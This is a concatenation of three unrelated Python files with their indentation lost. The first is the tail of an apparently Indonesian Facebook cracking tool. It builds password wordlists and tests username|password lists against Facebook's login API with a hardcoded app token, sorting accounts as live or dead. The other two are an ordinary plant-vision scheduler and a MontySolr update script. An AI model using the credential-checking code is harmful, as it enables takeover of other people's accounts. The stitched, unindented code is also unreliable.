file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
periodical_local_shell.py
|
import logging
import threading
from time import time, sleep
from planteye_vision.shell.shell import Shell
from planteye_vision.configuration.shell_configuration import PeriodicalLocalShellConfiguration
class PeriodicalLocalShell(Shell):
"""
This class describes a local shell that requests data periodically
"""
def __init__(self, config: PeriodicalLocalShellConfiguration):
self.config = config
self.time_scheduler = None
self.callback = None
def apply_configuration(self):
self.time_scheduler = TimeScheduler(self.config.parameters['time_interval'], self.execution_step)
self.time_scheduler.start()
def attach_callback(self, callback):
self.callback = callback
def execution_step(self):
self.callback()
class TimeScheduler:
def __init__(self, time_interval: float, executed_function):
self.time_interval = time_interval
self.executed_function = executed_function
self.thread = None
self.stop_flag = False
def start(self):
self.stop_flag = False
self.thread = threading.Thread(target=self.executable, args=[])
self.thread.start()
def stop(self):
self.stop_flag = True
def executable(self):
expected_step_end = time() - self.time_interval / 1000.0
while not self.stop_flag:
print('Loop step %f' % time())
logging.info('Shell execution step')
step_begin = time()
expected_step_end = expected_step_end + self.time_interval / 1000.0
print('Step begin %f' % step_begin)
print('Expected step end %f' % expected_step_end)
if step_begin > expected_step_end:
logging.error('Shell execution step skipped (consider increasing interval)')
print('Skip step')
continue
print('Execute step')
logging.info('Shell execution step began')
self.executed_function()
step_duration = time() - step_begin
debug_str = 'Shell execution step duration %i ms' % int(step_duration * 1000)
logging.debug(debug_str)
print('End step %f' % time())
print('Step execution duration %f' % step_duration)
if time() > expected_step_end:
print('Step execution longer than interval')
logging.warning('Shell execution step took longer (' + str(step_duration) + ') than given time interval ' + '(' + str(self.time_interval) + ')')
else:
print('Sleep for %f' % max(expected_step_end-time(), 0))
sleep(max(expected_step_end-time(), 0))
|
montysolrupdate.py
|
#!/usr/bin/env python
"""An assistant for updating MontySolr releases.
This script will update the codebase of MontySolr ON the machine(s)
that run it. This script is to be executed unattended and very often.
Here are the assumptions under which we work:
- PATH contains correct versions of ant, java, javac, git
- we have internet access
- we have write access to INSTDIR (/var/lib/montysolr)
- the INSTDIR already exists
- we run as user 'montysolr'
- we fetch tags from git
- the tags MUST be in a special format
<SOLR-MAJOR>.<SOLR-MINOR>.<MAJOR>.<MINOR>.<PATCH-INCREMENT>
We are tracking SOLR versions, therefore the first two numbers
correspond to the version of SOLR that is currently used by
MONTYSOLR
Here is what happens when respective numbers change:
SOLR-VER : version is made of Major+Minor, ie. 40, on change
everything is nuked, montysolr is completely rebuilt,
index is forgotten
MAJOR : major bump in MontySolr, the same behaviour as above
MINOR : only java modules are recompiled
the solr configs are replaced, index is forgotten
PATCH : all java modules are recompiled, solr configs replaced
with the new version, index is re-used
If all these conditions are met, we'll do the following
1. use git to fetch the latest tags
2. compare the latest tag against the current installed version
3. rebuild montysolr, do the necessary compilation, and setup
4. IFF we have the live-instance name
4.1 stop it (if it runs)
4.2 replace the symbolic link (live-5002 -> live-5002-<release-tag>)
4.3 point the index (live-5002/index -> live-5002-index-<increment>)
4.4 remove the index data IFF the difference in incr. version is > 2
tests are inside: test_montysolrupdate.py
"""
import sys
import os
import hashlib
import optparse
import re
import subprocess
import shutil
import re
import json
import urllib
import time
import socket
import threading
import Queue
import traceback
from contextlib import contextmanager
COMMASPACE = ', '
SPACE = ' '
tag_cre = re.compile(r'v?(\d+)\.(\d+)\.(\d+)\.(\d+)$')
INSTDIR = os.environ.get('MONTYSOLR_HOME','/var/lib/montysolr')
INSTNAME = os.environ.get('MONTYSOLR_EXAMPLE_NAME','adsabs')
GITURL = os.environ.get('MONTYSOLR_GIT','https://github.com/romanchyla/montysolr.git') #where to get the latest code from
NEW_INSTANCE_PORT_GAP = os.environ.get('MONTYSOLR_URL_GAP',10) #when we build a new release, it will be started as orig_port+GAP
START_ARGS = os.environ.get('START_ARGS','')
START_JVMARGS = os.environ.get('START_JVMARGS','')
PYTHON_RELEASE = os.environ.get('MONTYSOLR_PYTHON_RELEASE','2')
UPDATER_RELEASE = os.environ.get('MONTYSOLR_UPDATER_RELEASE','3')
ANT_HOME = os.environ.get('ANT_HOME','/usr/share/ant')
JAVA_HOME = os.environ.get('JAVA_HOME','/usr/lib/jvm/java-7-openjdk-amd64')
if "check_output" not in dir( subprocess ): # duck punch it in!
def f(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd)
return output
subprocess.check_output = f
def error(*msgs):
sys.stderr.write("**ERROR**\n")
for msg in msgs:
sys.stderr.write(msg)
sys.stderr.write("\n")
sys.exit(1)
def run_cmd(args, silent=False, strict=True):
cmd = SPACE.join(map(str, args))
if not silent:
print('$ %s' % cmd)
try:
if silent:
code = subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
else:
code = subprocess.call(cmd, shell=True)
except OSError:
error('failed: %s' % cmd)
else:
if strict and code != 0:
error('failed: %s' % cmd)
return code
def get_output(args):
return subprocess.check_output(SPACE.join(args), shell=True)
def check_basics():
if not os.path.exists(INSTDIR):
error('INSTDIR does not exist: %s' % INSTDIR )
if not os.access(INSTDIR, os.W_OK):
error('Cannot write into INSTDIR: %s' % INSTDIR)
def check_options(options):
if options.force_recompilation:
options.update = True
if options.test_scenario:
if not re.compile(r"^(\+|\-)?(major|minor|patch)$").match(options.test_scenario):
error("Wrong format in --test_scenario: " % options.test_scenario)
if options.test_scenario[0] == '+':
operator = lambda x: x+1
else:
operator = lambda x: x-1
if 'major' in options.test_scenario:
operation = lambda tag: tag.__setattr__('major', operator(tag.major))
elif 'minor' in options.test_scenario:
operation = lambda tag: tag.__setattr__('minor', operator(tag.minor))
elif 'patch' in options.test_scenario:
operation = lambda tag: tag.__setattr__('patch', operator(tag.patch))
else:
error("I'll never be executed :-) Or, will i?")
options.test_scenario = operation
def get_arg_parser():
usage = '%prog [options] tagname'
p = optparse.OptionParser(usage=usage)
p.add_option('-a', '--setup_prerequisites',
default=False, action='store_true',
help='Install all prerequisites')
p.add_option('-p', '--setup_python',
default=False, action='store_true',
help='Setup Python virtualenv')
p.add_option('--setup_ant',
default=False, action='store_true',
help='Install Ant (1.8.3) into perpetuum folder, this must be called with ANT_HOME=<perpetuum>/ant')
p.add_option('-d', '--check_diagnostics',
default=False, action='store_true',
help='Invokes /solr/montysolr_diagnostics when checking MontySolr health')
p.add_option('-u', '--update',
default=False, action='store_true',
help='Update live instances. You must supply their names as arguments')
p.add_option('-c', '--create',
default=False, action='store_true',
help='Create the live instance if it doesn\'t exist')
p.add_option('-x', '--start_indexing',
default=False, action='store_true',
help='Call invenio-doctor?command=discover for major/minor version upgrades')
p.add_option('-f', '--force_recompilation',
default=False,
action='store_true',
help='Force recompilation (even if no tag upgrade)',)
p.add_option('-t', '--timeout',
default=5*60, action='store',
help='Seconds after which live instance is declared dead',
type='float')
p.add_option('-o', '--stop',
default=False, action='store_true',
help='Stop running instances')
p.add_option('-s', '--start',
default=False, action='store_true',
help='Start instances')
p.add_option('-r', '--restart',
default=False, action='store_true',
help='Restart running instances')
p.add_option('-b', '--test_branch',
action='store',
help='Instead of a tag, checkout a branch (latest code) instead of a tag. Use only for testing!')
p.add_option('-S', '--test_scenario',
action='store',
default=None,
help='Change the existing installation tag - the script will think in needs to rebuild things. values: [+/-](major,minor,patch) Use only for testing! ')
p.add_option('-B', '--run_command_before',
default='', action='store',
help='Invoke this command BEFORE run - use to restart/update instance')
p.add_option('-A', '--run_command_after',
default='', action='store',
help='Invoke this command AFTER run - use to restart/update instance')
p.add_option('--no-virtualenv',
default=False, action='store_true',dest="no_venv",
help="Don't run anything in a virtualenv")
return p
def manual_edit(fn):
run_cmd([os.environ["EDITOR"], fn])
@contextmanager
def changed_dir(new):
print('$ cd %s' % new)
old = os.getcwd()
os.chdir(new)
try:
yield
finally:
print('$ cd %s' % old)
os.chdir(old)
def make_dist(name):
try:
os.mkdir(name)
except OSError:
if os.path.isdir(name):
sys.stderr.write('WARNING: dist dir %s already exists\n' % name)
else:
error('%s/ is not a directory' % name)
else:
print('created dist directory %s' % name)
class Tag(object):
def __init__(self, tag_name):
parts = tag_name.split('/')
result = tag_cre.match(parts[-1])
if result is None:
error('tag %s is not valid' % tag_name)
data = list(result.groups())
if len(parts) == 3:
self.ref = tag_name
else:
self.ref = 'not-valid-ref:%s' % tag_name
if data[3] is None:
# A final release.
self.is_final = True
data[3] = "f"
else:
self.is_final = False
# For everything else, None means 0.
for i, thing in enumerate(data):
if thing is None:
data[i] = 0
self.solr_ver = int(data[0])
self.major = int(data[1])
self.minor = int(data[2])
self.patch = int(data[3])
def __str__(self):
return "%d.%d.%d.%d" % (self.solr_ver,
self.major, self.minor, self.patch)
def __cmp__(self, other):
for att in ['solr_ver', 'major', 'minor', 'patch']:
a = getattr(self, att)
b = getattr(other, att)
if a < b:
return -1
elif a > b:
return 1
else:
continue
return 0
def make_tag(tag):
# make sure we're on the correct branch
if tag.patch > 0:
if get_output(['hg', 'branch']).strip().decode() != tag.basic_version:
print('It doesn\'t look like you\'re on the correct branch.')
if input('Are you sure you want to tag?') != "y":
return
run_cmd(['hg', 'tag', tag.hgname])
def get_release_tag(path=os.path.join(INSTDIR, 'RELEASE')):
if os.path.exists(path):
fo = open(path, 'r')
tag = Tag(fo.read().strip())
fo.close()
else:
tag = Tag('v0.0.0.0')
return tag
def get_latest_git_release_tag(path=os.path.join(INSTDIR, 'montysolr')):
"""calls git to find the latest tagged commit using:
git for-each-ref refs/tags --sort=-taggerdate --format='%(refname)' --count=1
"""
with changed_dir(path):
tag = get_output(['git', 'for-each-ref', 'refs/tags', '--sort=-taggerdate', '--format=\'%(refname)\'', '--count=1'])
if tag is None or tag.strip() == '':
error("Git returned no tagged reference")
return Tag(tag.strip())
def check_live_instance(options, instance_names):
git_tag = get_release_tag(path='montysolr/RELEASE')
example_tag = get_release_tag(path='montysolr/build/contrib/examples/%s/RELEASE' % INSTNAME)
# pretend some change has happened (used for testing)
if options.test_scenario:
options.test_scenario(example_tag)
if example_tag != git_tag:
build_example(git_tag,options)
example_tag = get_release_tag(path='montysolr/build/contrib/examples/%s/RELEASE' % INSTNAME)
base_path = os.path.realpath('.') # git_tag.minor = 1; git_tag.text = '40.1.1.2'
writer_counter = 0
list_of_reader_instances = []
writer_instance_name = None
for instance_name in instance_names:
if instance_name[-2:] == '#r':
list_of_reader_instances.append(instance_name[0:-2])
elif instance_name[-2:] == '#w':
writer_counter +=1
writer_instance_name = instance_name
if writer_counter > 1:
error("This script does not know how to handle situation\n" + \
"when you have more than 1 writer, you should invoke\n" + \
"the script for each set of writer+readers")
if len(list_of_reader_instances) > 0 and writer_instance_name is None:
error("When you use #r, you must specify also a writer")
# make sure the writer is first in the list of processed instances
if writer_instance_name is not None:
instance_names.insert(0, instance_names.pop(instance_names.index(writer_instance_name)))
writer_instance_name = writer_instance_name[0:-2]
writer_finished = False
for instance_name in instance_names:
if '#' in instance_name:
instance_name, instance_mode = instance_name.split('#')
else:
instance_mode = ''
symbolic_name = instance_name # live-9001
symbolic_name_data = '%s_data' % instance_name # live-9001_data
real_name = '%s_%s' % (instance_name, str(git_tag)) #live-9001_40.1.0.1
# if we are a 'reader', we need to point at the index of a writer
if instance_mode == 'r':
real_name_data = '%s_%s_data' % (writer_instance_name, str(git_tag)) #live-9000_40.1.0.1_data
else:
real_name_data = '%s_%s_data' % (instance_name, str(git_tag)) #live-9001_40.1.0.1_data
next_release = 'next-release_%s' % (instance_name) # next-release_live-9001
next_release_data = 'next-release_%s_data' % (instance_name) #next-release_live-9001_data
port = extract_port(symbolic_name)
if not os.path.exists(symbolic_name):
# instance does not exist yet
# status: OK, unittest OK
if options.create:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['ln', '-s', real_name, symbolic_name])
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
else:
assert os.path.exists(real_name_data)
run_cmd(['ln', '-s', real_name_data, symbolic_name_data])
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/%s/solr/data" % (base_path, symbolic_name)])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
if options.start_indexing:
assert start_indexing(symbolic_name, port=port)
else:
print('WARNING - instance name does not exist, skipping: %s' % symbolic_name)
continue
else:
if not os.path.islink(symbolic_name):
error('The live instance must be a symbolic link: %s ->' % (real_name, symbolic_name))
# some previous run has already created a candidate for the next run, this instance
# is indexing data, once it has finished, we can stop it and move upfront
if os.path.exists(next_release):
# status: OK, unittest OK
assert os.path.exists(next_release_data)
port = get_pid(os.path.join(next_release, 'port')) # it will fail if it doesn't exist
next_pid = get_pid(next_release + "/montysolr.pid")
if check_pid_is_running(next_pid)==False:
error("The next-release is present, but dead - we do not expect this!!!")
if instance_mode == 'r' and not writer_finished:
if os.path.exists('writer.finished'):
print 'We are seeing the deployment crashed - restarting deployment...'
writer_finished = True
run_cmd(['rm', 'writer.finished'])
else:
continue
if instance_mode == 'r' or is_invenio_doctor_idle(port):
assert stop_live_instance(next_release, max_wait=options.timeout)
assert stop_live_instance(symbolic_name, max_wait=options.timeout)
orig_port = get_pid(os.path.join(symbolic_name, 'port'))
run_cmd(['rm', symbolic_name])
run_cmd(['rm', symbolic_name_data])
run_cmd(['ln', '-s', os.path.realpath(next_release), symbolic_name])
run_cmd(['ln', '-s', os.path.realpath(next_release_data), symbolic_name_data])
run_cmd(['rm', next_release])
run_cmd(['rm', next_release_data])
run_cmd(['touch', 'writer.finished'])
writer_finished=True
assert start_live_instance(options, symbolic_name, orig_port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
print ('%s still getting itself ready, nothing to do yet...' % next_release)
continue
live_tag = get_release_tag(path='%s/RELEASE' % symbolic_name)
if live_tag == git_tag:
# status: OK, unittest missing
if options.force_recompilation or options.test_scenario:
run_cmd(['cp', '-fr', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, symbolic_name])
# just check if the instance is in a healthy state
kwargs = dict(max_wait=6) # it should be already running, so do it quickly
if options.check_diagnostics:
kwargs['tmpl'] ='http://localhost:%s/solr/montysolr_diagnostics'
if not check_instance_health(port, **kwargs) or options.test_scenario or options.force_recompilation:
if stop_live_instance(symbolic_name, max_wait=options.timeout):
start_live_instance(options, symbolic_name, port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
error("Can't restart: %s" % symbolic_name)
else:
print ('%s is HEALTHY' % symbolic_name)
continue # nothing to do
if live_tag.major != git_tag.major or live_tag.solr_ver != git_tag.solr_ver:
# major upgrade, we start a new instance and indexing
# status: OK, unittest: OK
if os.path.exists(real_name) or os.path.exists(real_name_data):
if os.path.exists(os.path.join(real_name, 'montysolr.pid')):
pid = get_pid(os.path.join(real_name, 'montysolr.pid'))
if pid != -1 and check_pid_is_running(pid):
error("The live instance at %s is already running, we cannot create new-release with the same name" % real_name)
run_cmd(['rm', '-fr', real_name])
if instance_mode != 'r':
run_cmd(['rm', '-fr', real_name_data])
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
else:
assert os.path.exists(real_name_data)
run_cmd(['ln', '-s', real_name, next_release])
run_cmd(['ln', '-s', real_name_data, next_release_data])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
run_cmd(['ln', '-s', '%s/%s' % (base_path, real_name_data), "%s/%s/solr/data" % (base_path, next_release)])
temporary_port = port+NEW_INSTANCE_PORT_GAP
assert start_live_instance(options, next_release, port=temporary_port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
if options.start_indexing:
assert start_indexing(next_release, port=temporary_port)
elif live_tag.minor != git_tag.minor:
# minor upgrade, we can re-use the index (we create a copy and keep)
# the old index in place
# status: OK, unittest: OK
if options.test_scenario and os.path.exists(real_name):
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, real_name])
else:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
if instance_mode != 'r':
run_cmd(['mkdir', real_name_data])
run_cmd(['cp', '-fR', '%s/*' % symbolic_name_data, real_name_data])
else:
assert os.path.exists(real_name_data)
stop_live_instance(symbolic_name, max_wait=options.timeout)
run_cmd(['rm', symbolic_name])
run_cmd(['rm', symbolic_name_data])
run_cmd(['ln', '-s', real_name, symbolic_name])
run_cmd(['ln', '-s', real_name_data, symbolic_name_data])
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/solr/data" % real_name])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
else:
# just a patch, we will re-use index
# status: OK, unittest: OK
stop_live_instance(symbolic_name, max_wait=options.timeout)
if options.test_scenario and os.path.exists(real_name):
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s/*' % INSTNAME, real_name])
else:
run_cmd(['cp', '-r', 'montysolr/build/contrib/examples/%s' % INSTNAME, real_name])
run_cmd(['rm', '-fr', "%s/solr/data" % real_name], strict=False)
run_cmd(['ln', '-s', '%s/%s' % (base_path, symbolic_name_data), "%s/solr/data" % real_name])
run_cmd(['rm', symbolic_name])
run_cmd(['ln', '-s', real_name, symbolic_name])
assert start_live_instance(options, symbolic_name,
port=port,
max_wait=options.timeout,
list_of_readers=list_of_reader_instances,
instance_mode=instance_mode)
def extract_port(symbolic_name):
digits = []
for l in reversed(symbolic_name):
if l.isdigit():
digits.insert(0, l)
else:
break
if len(digits) == 0:
error("The instance name must end with the port, eg. live-9002. We got: %s" % symbolic_name)
return int(''.join(digits))
def save_into_file(path, value):
assert isinstance(value, int)
fo = open(path, 'w')
fo.write(str(value))
fo.close()
def start_indexing(instance_dir, port):
url = 'http://localhost:%s/solr/invenio-doctor' % port
rsp = req(url, command='status')
if rsp['status'] == 'busy':
print ('WARNING: live instance is reporting to be already busy: %s' % instance_dir)
return
rsp = req(url, command='discover')
rsp = req(url, command='start')
time.sleep(3)
if is_invenio_doctor_idle(port):
error('something is wrong, indexing finished too fast %s' % instance_dir)
return True
def check_instance_health(port, max_wait=30, tmpl='http://localhost:%s/solr/admin/ping'):
url = tmpl % port
i = 0
max_time = time.time() + max_wait
rsp = None
while time.time() < max_time:
try:
rsp = req(url)
if rsp['status'] == '0' or rsp['status'] == 'OK':
return True
except Exception, e:
if rsp is None:
print "Waiting for instance to come up at %s: %d sec." % (url, max_time - time.time(),)
if i > 100:
traceback.print_exc(e)
if rsp is not None and 'error' in rsp:
error(str(rsp['error']).replace('\\n', "\n"))
time.sleep(1)
i += 1
return False
def is_invenio_doctor_idle(port):
url = 'http://localhost:%s/solr/invenio-doctor' % port
rsp = req(url, command='status')
if rsp['status'] == 'busy':
return False
elif rsp['status'] == 'idle':
return True
else:
error('something is wrong, unxpected reply: %s' % rsp)
def reload_core(port):
url = 'http://localhost:%s/solr/admin/cores?action=RELOAD&core=collection1' % port
rsp = req(url, command='status')
if 'status' in rsp and rsp['status'] == '0':
return True
else:
error('something is wrong, unexpected reply: %s' % rsp)
def make_request(q, url, kwargs):
try:
kwargs['wt'] = 'json'
params = urllib.urlencode(kwargs)
page = ''
conn = urllib.urlopen(url, params)
page = conn.read()
rsp = json.loads(page)
conn.close()
q.put(rsp)
except Exception, e:
q.put(e)
def req(url, **kwargs):
q = Queue.Queue()
t = threading.Thread(target=make_request, args = (q, url, kwargs))
t.start()
t.join(3.0)
r = q.get()
if isinstance(r, Exception):
raise r
elif r is None:
raise Exception("Timeout getting url=%s & %s" % (url, kwargs))
return r
def get_pid(pidpath, raw=False):
if os.path.exists(pidpath):
with open(pidpath, 'r') as pidfile:
r_pid = pidfile.read().strip()
try:
if raw:
return r_pid
return int(r_pid)
except ValueError:
return -1
return -1
def acquire_lock(pidpath):
fo = open(pidpath, 'w')
fo.write(str(os.getpid()))
fo.close()
def remove_lock(pidpath):
os.remove(pidpath)
def check_pid_is_running(pid):
if os.path.exists('/proc/%s' % pid):
return True
return False
def check_prerequisites(options):
if options.setup_ant:
setup_ant(options)
if options.setup_prerequisites or options.setup_python:
setup_python(options)
check_ant(options)
if not os.path.exists('montysolr'):
run_cmd(['git', 'clone', GITURL, 'montysolr'])
with changed_dir('montysolr'):
run_cmd(['git', 'fetch', '--all'])
#run_cmd(['git', 'reset', '--hard', 'origin/master'])
#run_cmd(['git', 'checkout', 'master'])
def check_ant(options):
version = get_output(["ant -version"])
